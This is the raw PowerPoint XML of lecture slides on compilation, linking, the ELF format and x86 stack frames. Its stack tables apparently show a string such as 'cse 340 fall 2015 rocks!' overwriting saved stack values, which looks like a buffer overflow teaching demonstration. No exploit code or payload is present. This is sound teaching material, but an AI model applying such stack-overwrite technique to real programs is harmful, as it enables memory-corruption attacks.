            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60757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20" end="20"/>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22" end="22"/>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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 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0xfd2e0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0x804840e</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357945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ectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999962" y="5312720"/>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999962" y="6055602"/>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999962" y="563379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5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xEl>
                                              <p:pRg st="16" end="1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xEl>
                                              <p:pRg st="17" end="1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
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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
                                            <p:txEl>
                                              <p:pRg st="20" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="21" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="22" end="2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xEl>
                                              <p:pRg st="24" end="24"/>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7">
                                            <p:txEl>
                                              <p:pRg st="25" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="26" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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7">
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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7">
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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7">
                                            <p:txEl>
                                              <p:pRg st="30" end="30"/>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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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7">
                                            <p:txEl>
                                              <p:pRg st="32" end="3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7">
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>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7">
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>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7">
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>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7">
                                            <p:txEl>
                                              <p:pRg st="40" end="40"/>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7">
                                            <p:txEl>
                                              <p:pRg st="41" end="41"/>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7">
                                            <p:txEl>
                                              <p:pRg st="42" end="42"/>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7">
                                            <p:txEl>
                                              <p:pRg st="43" end="43"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="44" end="44"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="45" end="45"/>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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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15"/>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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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8" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15"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128</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0xfd2e0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0x804840e</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357945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391967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129</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0xfd2e0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0x804840f</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38999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54885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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker combines the binary object with libraries, resolving references that the code has to external objects (e.g., functions) and creates the final executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The linker is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static linking is performed at compile-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic linking is performed at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common executable formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: PE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1974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130</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0x804840f</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38999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70833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131</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15448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5579731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132</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15448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0xfd2c0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12816527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133</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0x8048417</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430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4762856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dirty="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134</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0x8048417</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430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84964605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135</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0x804841e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="47152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38249428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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="24756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0xfd2bc</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5980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195593833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137</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5980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19233276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138</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0x80483f5</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86548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144447992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0xfd2e0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en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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139</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0x80483f5</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86548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7143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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker combines the binary object with libraries, resolving references that the code has to external objects (e.g., functions) and creates the final executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The linker is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static linking is performed at compile-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic linking is performed at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common executable formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: PE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43628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88246"/>
          <a:ext cx="2831284" cy="48768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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105743" y="21844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43449" y="5110284"/>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0x80483f7</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1501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19033380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141</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endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x80483f7</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1501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0xfd290</a:t>
            </a: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3717748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142</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endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x80483fa</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4003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52554050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143</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0x8048504</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0x80483fa</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4003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902742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144</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x80483fd</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702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042583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145</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0x8048504</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0x80483fd</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702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0366317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146</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0x8048401</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19524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203874830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147</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x8048404</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2370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214114063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148</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0x8048404</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2370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76719647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r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</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149</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0x8048407</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487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779305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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Executable and Linkable Format (ELF) is one of the most widely-used binary object formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF is architecture-independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF files are of four types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocatable: need to be fixed by the linker before being executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable: ready for execution (all symbols have been resolved with the exception of those related to shared libs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared: shared libraries with the appropriate linking information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: core dumps created when a program terminated with a fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139440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43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43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43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943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943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9430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9430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943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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</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150</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27843920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151</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36090204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152</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18681757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153</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01483607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0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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154</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0347880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0x8048423</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155</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36019975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 201 (0x31303220)</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156</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91379274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157</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45905509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158</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0xfd290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22325018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159</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511944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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Typical ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="998457" name="Group 57"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="2171701"/>
          <a:ext cx="8686800" cy="3123725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="342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Name</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Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Description</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Type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Flags</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571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.text</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the program’s code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EXECINSTR</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.data</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initialized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WRITE</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6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.rodata</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read-only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.bss</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uninitialized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NOBITS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ALLOC</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55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.init and .fini</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pre and post code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EXECINSTR</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85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84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160</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0xfd2bc</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0x6c6c6166</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0x804840c</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8273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4366460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161</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0xfd2bc</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0x6c6c6166</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0x804840d</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8273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55183846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 201 (0x31303220)</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162</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0x6c6c6166</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0x31303220</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511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56013801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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="140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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
